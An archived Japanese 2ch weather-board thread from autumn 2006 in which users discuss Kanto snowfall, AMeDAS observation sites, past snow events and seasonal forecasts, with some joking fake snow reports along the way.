132 :名無しSUN:2006/09/24(日) 10:57:37 ID:vUs9bybP
相模湖で初霜だそうだ

133 :名無しSUN:2006/09/24(日) 11:10:23 ID:zqL48bbl
現状
         気温 雨  風 日照
相模湖     ×  ○  ×  ×
相模原中央  ×  ○  ×  ×
日吉       ×  ○  ×  ×
丹沢湖     ×  ○  ×  ×
海老名     ○  ○  ○  ○
横浜       ○  ○  ○  ○
平塚       ×  ○  ×  ×
辻堂       ○  ○  ○  ○
箱根       ×  ○  ×  ×
小田原     ○  ○  ○  ○
三浦       ○  ○  ○  ○

新設が難しいのなら全部四要素に格上げしてもいいくらい

134 :名無しSUN:2006/09/24(日) 11:29:02 ID:x/QXJIpv
正確に積雪を計る時は芝生か木の板の上か土の上どれが良いの?気象庁のアメダスと同じような方法を手動でやってみようかと思ってるんだが

135 :名無しSUN:2006/09/24(日) 11:35:39 ID:zqL48bbl
>>134
アメダスの場合は次のページのような設置条件を満たしているはず
http://www.kishou.go.jp/know/kansoku_guide/e2.htm

まあ枯葉や霜などで誤観測も結構出るのだがw

あとは吹き溜まりになりやすい方角などもあるので注意

136 :名無しSUN:2006/09/24(日) 14:38:10 ID:NO4f1Flq
何かこのスレ、パソコンからだとウイルスで見れない。

137 :名無しSUN:2006/09/24(日) 17:05:43 ID:iU+SgZu6
>>135
これカナーリ広い土地がないとダメなんだね。

138 :名無しSUN:2006/09/24(日) 19:36:30 ID:+GDHo/a5
>>135
レスありがd。

>>137
確かにかなり広くないとダメだねorz

139 :名無しSUN:2006/09/24(日) 20:40:11 ID:QdDylVYg
27〜28日は雪っぽいね。

140 :名無しSUN:2006/09/24(日) 22:07:51 ID:NjTQr4NL
神奈川で気象庁が積雪観測してるのは横浜だけでしょ。
あとは市役所や消防署や道路管理してるとこだよね。

141 :名無しSUN:2006/09/24(日) 22:18:31 ID:vNYEfLme
そうだよな〜
あと相模湖・相模原・海老名・箱根の山間部や県央に積雪計欲しい。

142 :名無しSUN:2006/09/24(日) 22:49:14 ID:FQYuN1tw
26日の天気図が1月なら大手町20cm超え間違いないところなのに

143 :名無しSUN:2006/09/25(月) 01:34:42 ID:XRUwNaT0
マジだw

144 :名無しSUN:2006/09/25(月) 08:01:56 ID:Oo/RT2CD
>>142
伊豆半島の南で閉塞段階に入り動きが遅くなった低気圧、三陸沖には
優勢な高気圧。完璧じゃないか我が軍は。
都心20cm、神奈川埼玉西部は50cmカタイ

145 :名無しSUN:2006/09/25(月) 12:23:23 ID:XRUwNaT0
冬にこのような低気圧が来ないのが
現実………

146 :名無しSUN:2006/09/26(火) 09:18:05 ID:T+/rfpXE
雪降ってきたね。品川区

147 :名無しSUN:2006/09/26(火) 15:12:31 ID:q6OuvgqT
閉塞して北上といえば何年だったか?の1/15日 結果大雨

148 :名無しSUN:2006/09/26(火) 16:53:30 ID:tA7TIElX
2005かなぁ。確かセンター試験当日に大雨だったと思う

149 :名無しSUN:2006/09/28(木) 00:39:12 ID:pIWe+FLO
ちなみに今日の低気圧が真冬に来ても、明らかに暖気巻上げで雨になるパターン。
降り始めだけ雪でその後山間部を除いてザーザーぶりの雨でかえってストレスが
たまるだろう。

150 :名無しSUN:2006/09/28(木) 00:42:37 ID:D3matr6x
>>149
2005/01/15-16のパターンか。
北海道に向かわないであっさり東に抜けてくれた方が、いいんだな。

151 :名無しSUN:2006/09/28(木) 12:28:57 ID:Xj518bKu
今度の冬は一体どうなるんだろうね?いまの
時期は別に降らなくたっていいと冷静になって
られるのだが、去年末のようにいきなり関東
以外で大雪ってのがあるとすっごく悔しいよ。
それで雪を待つ心に火がついちゃう。降らない
のなら全国的に降らなきゃいいのに。
俺って他人の幸せを喜べないやな性格だな。

152 :名無しSUN:2006/09/30(土) 01:24:41 ID:Oz9mc6pc
>>151
今の季節でも今年の1/21を思い出すとワクワクしてくる。
後二ヶ月半で雪の季節が到来するね。

153 :名無しSUN:2006/09/30(土) 17:10:11 ID:ev3WayWB
来年2月に関東は前代未聞の大雪にみまわれるだろう。そして
3日間交通がマヒするだろう。

154 :名無しSUN:2006/10/01(日) 00:07:17 ID:NgGZeWwH
>>153
嬉しいこと言ってくれるじゃねェの。
まぁまぁ寿司食いねぇ寿司、江戸っ子だってね。

155 :名無しSUN:2006/10/01(日) 14:48:08 ID:L2IMSYc3
あと2〜3ヶ月だ・・・。

156 :名無しSUN:2006/10/01(日) 15:18:42 ID:9pHwCM+T
1/21の雪だけどあんな雪は始めてだったな。
1984年以来じゃないのかな?

埼玉西部だけど降っている間ずっと−2℃前後で、昼の間はアスファルトには
積もらなかった。でも芝生の上や車の上などには積雪し、
その雪を触るとパサパサとしていて、なぜか融けなかった。
芝生の上で転がして見ると簡単にくっついて大きな雪だるまが簡単に作れた。

でも夕方になると雪質が変わって普通の雪になった。
1〜2時間でアスファルトに7〜8cm位積もった。

157 :川越市:2006/10/01(日) 16:52:07 ID:eC9M0nI5
雪に変わってきた件

158 :名無しSUN:2006/10/01(日) 18:01:46 ID:eC9M0nI5
航空公園はうっすら雪化粧。
犬が走り回っている姿がほほえましい。

159 :名無しSUN:2006/10/01(日) 23:00:25 ID:hmSt+CXk
ttp://snow.aasano.com/index.html
このサイトで東京の雪について書かれているよ

160 :名無しSUN:2006/10/01(日) 23:22:09 ID:AMmNzNps
21世紀にはいり、王道、発達では都心では雪が降らないことが証明されてしまった。
寒気が十分で、お辞儀程度、もしくは暖気の影響を受けないミニ低気圧ぐらい
しか雪の降るチャンスはなくなってしまった。つまり二桁の積雪はもう過去の
ものになってしまったと考えるのが妥当だろう。


161 :名無しSUN:2006/10/02(月) 08:05:27 ID:qEn0Ip/2
気象庁のアメダス見て、全国的に酷暑だなぁとか思っちまったw

162 :名無しSUN:2006/10/02(月) 15:26:54 ID:8fZMnemU
長期予報だと今度の冬は気温は高めだそうだ。
と言う事は気温は低めになると見た。
この所外れ放しだからな。


163 :名無しSUN:2006/10/02(月) 16:27:12 ID:HFNT3oe3
>>162
いいとこ突いてるw

俺もそう思う。


164 :名無しSUN:2006/10/02(月) 23:06:06 ID:V04dbph3
甘いさ。
気温が低めと予想したときは外れるが
気温が高めと予想したときは当たる

165 :名無しSUN:2006/10/03(火) 00:10:08 ID:U5RmpsfG
去年は完全に外れてt(ry

166 :名無しSUN:2006/10/03(火) 05:03:21 ID:u3ZJgPSC
寒冬予想に切り替えたのは12月の中旬で、すでに豪雪が始まっていた。
でもって、切り替えた途端に、1月以降が平年並になる見込みになった。

167 :名無しSUN:2006/10/03(火) 20:32:53 ID:l39vId9D
>>166
結局、気象庁は予測をしてるのではなくて、現状を淡々と報告しているだけなのですか?

168 :名無しSUN:2006/10/03(火) 21:10:11 ID:g8Y39NTz
気象庁には今度の冬は気温が高めで関東地方は降水量は少ないと言ってもらいましょう。

169 :名無しSUN:2006/10/03(火) 21:47:30 ID:BZ9JkOZX
7年間くらい同じ文言だよ。(季節予報と3ヶ月予報

170 :名無しSUN:2006/10/04(水) 07:46:21 ID:l27E5Sam
>>168
それって気圧配置的にはどんな状況なんだろう。

171 :名無しSUN:2006/10/04(水) 08:16:48 ID:Fv/8oLwy
>>170
高温で降水量が少ない>2004年2月 8.5℃ 20ミリ、2002年2月 7.9℃ 9ミリ
低温で降水量が多い>2001年1月 4.9℃ 126ミリ、1998年1月 5.3℃ 122ミリ

低温かつ降水量が多いという、一見矛盾するような月が結構あった。

関東南部は寒気が来ていても冬型晴天なら最高気温がかなり上がる。
一方、寒気ダメダメでも天気が悪いと最高気温が東海以西よりも低い。

東海以西の冬の平均気温を下げるのは寒気団、関東の場合はそれに加えて
ぐずついた天気という武器によって暖冬シーズンに低温劇場を作ることができる。

172 :名無しSUN:2006/10/04(水) 18:31:29 ID:tig8ifRA
雪だ!

173 :名無しSUN:2006/10/06(金) 11:15:54 ID:HSpR57N5
富士山では大雪だろうな

174 :名無しSUN:2006/10/07(土) 15:43:57 ID:lSXF3hrj
真冬なら綺麗な冬型だから関東山沿いは雪だろうな、今晩谷川岳初雪かな

175 :名無しSUN:2006/10/07(土) 16:07:57 ID:9PGsENvO
>>174
高層天気図(850,500)の気温を見れ、ムリムリ

176 :名無しSUN:2006/10/07(土) 16:48:36 ID:lSXF3hrj
未だ寒気入らないね、年々温暖化かな、二十日すぎかな、

177 :名無しSUN:2006/10/07(土) 17:09:18 ID:DeoHxhAq
>>176
ヒント:まだ10月

178 :名無しSUN:2006/10/07(土) 18:11:53 ID:aDwaWZkM
ID:lSXF3hrj

おまいはシベリアにでも住め

179 :名無しSUN:2006/10/07(土) 19:49:01 ID:lSXF3hrj
山沿いの気温低下してきた、高い山は雪かな、浅間山とか

180 :名無しSUN:2006/10/07(土) 23:22:49 ID:lSXF3hrj
やはり3000級は雪だね、関東で降る高い山はなんだろう?

181 :名無しSUN:2006/10/08(日) 06:00:54 ID:V35dBMaG
日光白根山(関東最高峰) 2577m
ただしふもとから見えるかは不明。

浅間山 2568m
見やすさを考慮すればこいつ。関東平野北西部なら、大体どこからでも見える。

182 :八王子:2006/10/08(日) 12:10:07 ID:ZRR7dNjb
おおー、今日は富士の冠雪が見えるね!
風が強い分空気が澄んでるんだな。
昨日の夜も夜中なのに月明かりで富士のシルエットがはっきり見えたしね。

183 :名無しSUN:2006/10/09(月) 10:28:44 ID:AIZaGjn+
結局、どのくらいの高い山が初冠雪又は初雪だったのかな、関東は谷川、浅間、白根、男体は、ダメだったのかな、

184 :名無しSUN:2006/10/09(月) 10:58:52 ID:1/KkpnbH
>>183
渋峠はみぞれだったらしいよ。

185 :名無しSUN:2006/10/13(金) 22:33:27 ID:XMV1wFFM
雪降ってきたね

186 :名無しSUN:2006/10/13(金) 22:41:00 ID:YR9bsfUa
>>185
どこの山ですか

187 :名無しSUN:2006/10/13(金) 23:12:19 ID:1hSM+zRH
今回で谷川、武尊ぐらい初冠雪かな

188 :名無しSUN:2006/10/13(金) 23:20:56 ID:XMV1wFFM
山手です

189 :名無しSUN:2006/10/15(日) 08:17:28 ID:alZoxTL1
低気圧が接近しているときに、北海道が強烈な寒気に覆われていれば多少のハンデは北東気流で
なんとかなってしまう。
強い冬型の直後の南岸低気圧とか、当日朝の冷え込みとか、関係なくなる。1998/01/15が良い例。

190 :名無しSUN:2006/10/15(日) 09:14:01 ID:US8h3sIG
寒いな…と思って外見たら、雪じゃんw
まさか10月に降るとは思わなかった。

191 :名無しSUN:2006/10/15(日) 10:06:15 ID:4NtvMg7Q
>>190はデトロイトかシカゴ市民

192 :名無しSUN:2006/10/15(日) 10:17:59 ID:alZoxTL1
五大湖周辺の雲画像って見たいな。酢蒸気の供給状態がどうなってんだろ

193 :名無しSUN:2006/10/15(日) 11:21:22 ID:TFPo01Je
酢の蒸気がながれて来そうな場所は、愛知県高浜市ですか?

194 :名無しSUN:2006/10/15(日) 11:26:58 ID:fRvrtAOh
>>193
誰が上手いことry

195 :名無しSUN:2006/10/19(木) 09:49:06 ID:zeC8HWOT
モスクワは雪です。モスクワってテレビの画面で見ると冬はいつも
雪が降っているけど何メートルも積もるような豪雪にはならないね。
何であんなに降っているのに積もらないんだろ?

196 :名無しSUN:2006/10/21(土) 09:19:50 ID:TZ5b7u3L
>>195
気温が低すぎるのと、水温の高い海から遠いので、空気中の水蒸気量が少なすぎて
降ってもちらつく程度じゃない?市内が真っ白なのは何日もかけて積もった雪が溶けないだけ。
ロシアならもう少し気温が高くて海が近い、黒海沿岸の方が雪が多そうだ。
どれくらい積もるかはしらないけど。

197 :名無しSUN:2006/10/21(土) 09:30:36 ID:NlKK5Dyk
こっちも雪だぞ!横浜

198 :名無しSUN:2006/10/21(土) 09:48:42 ID:J7bzSA8k
>>197
起きろ、朝だぞ

199 :名無しSUN:2006/10/21(土) 22:47:33 ID:MZ2RfIJT
佐賀も積雪してます

200 :名無しSUN:2006/10/28(土) 12:58:55 ID:NYEnRgOE
200get

201 :名無しSUN:2006/10/29(日) 09:38:32 ID:oKxg8Ybi
うp

202 :名無しSUN:2006/11/02(木) 17:34:50 ID:YeJerzS4
このスレはいつ頃開幕ですか?

203 :名無しSUN:2006/11/02(木) 17:59:03 ID:ATVkvdqr
旭川や稚内では昨日初雪だったそうだ。また冬が来るね。

204 :名無しSUN:2006/11/03(金) 21:23:04 ID:qQdQ4VXR
今年の関東の冬は、雪は降らないのですか?
予測してください
お願いします。
関東で暖冬時、雪が降らない年代は
全国的、世界的にどんな気象なのでしょうか?


205 :名無しSUN:2006/11/03(金) 21:47:09 ID:m9DrlXSq
>>202
開幕前から既に2割以上使ってるがなw

206 :名無しSUN:2006/11/03(金) 22:40:46 ID:Y0bKWZHS
そろそろ関東北部の山で雪が降り出すかな?
11月上旬では無理か

207 :名無しSUN:2006/11/03(金) 23:05:16 ID:dyzDCy8W
>>206
去年は10月25日前後で雪が積もっていた覚えがある

208 :名無しSUN:2006/11/04(土) 00:26:38 ID:Vf2TL71M
>>207
今年はまだ積もっていないよな
今年は去年に比べると季節の歩みが遅いな・・・

209 :名無しSUN:2006/11/04(土) 17:31:52 ID:z5ZN9bUd
温暖化でどんどん初雪日が遅くなるな…

210 :名無しSUN:2006/11/04(土) 22:02:04 ID:O1Zgu7n4
この暖かさからすると、東京の年内の初雪はほぼ絶望的。最悪、2月以降に
なる可能性すらあるだろう。

211 :名無しSUN:2006/11/04(土) 23:43:47 ID:WhSdGbRj
>>210
ヒント:2004年

212 :名無しSUN:2006/11/04(土) 23:45:16 ID:WhSdGbRj
>>210
大ヒント:2004年12月5日

213 :名無しSUN:2006/11/04(土) 23:46:57 ID:6kOCOZxi
>>212
2004年は12月中に降雪したっけ?
それならまだ希望が持てる

214 :名無しSUN:2006/11/05(日) 00:42:06 ID:OlAY9VEz
つ大晦日

215 :名無しSUN:2006/11/05(日) 00:50:38 ID:pwSqpOuP
つ12月29日と大晦日の2回

216 :名無しSUN:2006/11/05(日) 01:43:13 ID:V+w0UH54
>>210のコピペ昨シーズンも見たな

217 :名無しSUN:2006/11/05(日) 02:51:05 ID:ZTvDOosU
来月またガック氏が登場するのか

218 :名無しSUN:2006/11/05(日) 02:51:15 ID:6rLCywM4
>>210
1月がダメでも3月4月がある、それが東京のクロマティ

219 :名無しSUN:2006/11/05(日) 15:27:36 ID:Wby1VPEG
関東降雪には無関係だが12日頃からの寒気は本気だな。
売れ筋もガラッと変わるし流通関係に携わってるものには要注意だな。

220 :名無しSUN:2006/11/05(日) 18:00:13 ID:EV/GWC/L
流れを断ち切る話題だけど
このスレを消費し終わったら
**関東降雪情報スレッド(06-07)VOL.1**
を本スレとすることでいいですか?

221 :名無しSUN:2006/11/06(月) 00:37:46 ID:x4lxRrop
06-07はいらない

222 :名無しSUN:2006/11/06(月) 10:40:16 ID:bnzxzZQ2
都市化に伴い、東京の初雪は早くなる傾向にある。
昔は初雪が年明けになる年も多かったが、今後は年内に初雪を観測する年が増える。
また、都市化の影響により降雪日数(特に俄雪)が多くなる傾向にある。

223 :名無しSUN:2006/11/06(月) 14:48:09 ID:/4JNHi+L
ただし大雪は激減し終雪日も早くなった

224 :名無しSUN:2006/11/06(月) 20:56:20 ID:hU0pXj8S
今冬、東京で観測史上初の降雪日数0日

225 :名無しSUN:2006/11/06(月) 21:31:34 ID:Gz/7kqeH
>>224みたいな書き込みを見ても笑える様になった

226 :名無しSUN:2006/11/06(月) 21:33:20 ID:Gz/7kqeH
>>214-215
思い出した
雪降ったよな29日と大晦日。

227 :名無しSUN:2006/11/06(月) 21:44:31 ID:EAc9vjNo
>>222
へえー、都市化が進めば初雪が早くなり、降雪日数が多くなるんだw

228 :名無しSUN:2006/11/06(月) 22:37:44 ID:HJo+gxrz
それ言ってたの森田氏だっけ?
都市化に伴う乾燥化が東京の降雪日数を増やす云々で、学会で発表したとか言ってたな。
都市化の昇温より昇華熱作用効果の方が大きいって事か?

229 :名無しSUN:2006/11/07(火) 14:58:05 ID:3fkAZuWa
大きな話だと、地球の温暖化は海流に影響を与えて
結果的には大寒波を生み出すとか言うしな。
デイ・アフター・トゥモローもその理論に基づいて作られた映画だったかと。

230 :名無しSUN:2006/11/09(木) 12:05:13 ID:KH8c/Lts
>>222
それはオレも実感している。45年生きているけど小学校時代は
東京の雪と言うと2月が定番だった。降れば結構積もったし
大雪注意報も出た。でも実際降雪と言うとものすごく少なかった。
ちょっとでも降ると、「あっ雪だ!」って感じだった。
にわか雪程度なら今の方が降雪日数が多くなった。雪がちらつく
事自体はあまり珍しい事ではなくなった。
最近は初雪が12月中の事が多いし、1996年以降東京に2月に
大雪が降る事がなくなった。これ以上初雪が早まっちゃうとまさか
11月と言うわけにも行かないだろうから雨になっちゃうよ。

>>229
でも凍りつくのは緯度の高いヨーロッパや北米での話し。
温暖化で海水が薄まって暖かいメキシコ湾流の勢いが
弱まるため高緯度本来の寒冷な気候になるのが原因。
日本は元々中緯度の温帯地域にあるから日本が慣例化
に向かうとは思いにくい。

231 :名無しSUN:2006/11/09(木) 12:06:37 ID:KH8c/Lts
>>230
ごめん、慣例化 → 寒冷化でした。

232 :名無しSUN:2006/11/23(木) 22:54:58 ID:0q+aX8Bm
【東海】御殿場周辺降雪情報スレッド【関東】
http://science4.2ch.net/test/read.cgi/sky/1109663546/55

55 名前: 名無しSUN 投稿日: 2006/11/23(木) 22:35:50 ID:NlXxwgqz
(・∀・)キター 祝い 初雪

233 :名無しSUN:2006/11/24(金) 12:00:43 ID:S+OsU7lh
気象庁発表の長期予報によると、今度の冬は全国的に
暖冬で雪は少ないそうだ。しかしこういう時にこそ関東に
とってはチャンスなのかも。ヒント: 1998年。

234 :名無しSUN:2006/11/25(土) 09:59:59 ID:+g0CZKTV
つーか、エルニーニョだし

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)